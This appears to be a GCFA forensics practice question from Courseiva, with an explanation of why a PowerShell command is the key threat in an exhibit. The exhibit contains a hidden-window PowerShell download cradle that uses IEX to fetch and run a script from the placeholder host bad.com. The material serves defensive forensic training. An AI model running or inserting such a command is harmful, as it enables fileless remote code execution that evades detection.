Courseiva

GCFA Practice Question: Identification of Malicious and Normal Activity

Exhibit

C:\Windows\System32\cmd.exe /c echo 'test' > C:\Users\Public\test.txt
cmd.exe /c "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://bad.com/a.ps1')"

Refer to the exhibit. What is the most critical security concern presented by the second command line?

⚠ Common exam trap

Candidates focus on the URL or the PowerShell process itself rather than the 'IEX' (Invoke-Expression) cmdlet. IEX is the specific mechanism that enables fileless, memory-resident execution of remote code.

Answer choices

Why each option matters

Answer the question above first, then reveal the full breakdown to understand why each option is right or wrong.

Correct answer & explanation

✓

The usage of 'IEX' to execute code in memory.

The command performs an 'In-Process' download and execution of a remote PowerShell script. By using 'IEX' (Invoke-Expression) combined with a web client download, the attacker executes the script directly in memory, bypassing the need to write a file to disk. This is a highly effective evasion technique that leaves minimal forensic footprint and is a standard delivery method for sophisticated, memory-resident malware payloads.

Answer analysis

Option-by-option breakdown

For each option: why learners choose it and why it is or isn't the right answer here.

  • ✗

    The usage of the 'echo' command.

    Why it's wrong here

    The echo command is a standard shell utility used for simple text output. While it could be used for file creation, it is not inherently malicious. Focusing on this minor detail distracts from the far more dangerous memory-resident script execution occurring in the second part of the provided command line.

  • ✓

    The usage of 'IEX' to execute code in memory.

    Why this is correct

    Invoke-Expression (IEX) allows PowerShell to execute strings as commands. Downloading a script from a URL and piping it to IEX is a common 'fileless' attack technique. This avoids writing the malicious script to disk, making it difficult for traditional file-based antivirus to detect or analyze the payload.

  • ✗

    The creation of a text file in C:\Users\Public.

    Why it's wrong here

    While writing to public directories is often suspicious, the file created here is just a test file. It is a secondary event compared to the execution of an external script from the internet. The primary threat is the remote code execution, not the benign file creation observed earlier.

  • ✗

    The command uses the 'hidden' window flag.

    Why it's wrong here

    The '-w hidden' flag hides the PowerShell window to prevent user interaction or visual alerts. While this is an evasion tactic, it is not the primary threat. The core issue is the remote script execution via IEX; the hidden window is merely a supporting feature to avoid detection.

About these practice questions

Courseiva writes every GCFA question from scratch — 292 in total, each with an explanation and a wrong-answer breakdown. None are copied from real exams or dumps. Learn why practice questions differ from exam dumps →

How Courseiva writes practice questions · Editorial policy

JA

Written and reviewed by Johnson Ajibi, MSc IT Security

Senior Network & Security Engineer · founder of Courseiva

Last reviewed September 2026 · checked against the official GIAC exam blueprint

This GCFA practice question is part of Courseiva's free GIAC certification practice question bank. Courseiva provides original exam-style practice questions with explanations, topic-based practice, mock exams, readiness tracking, and study analytics to help learners prepare for the GCFA exam.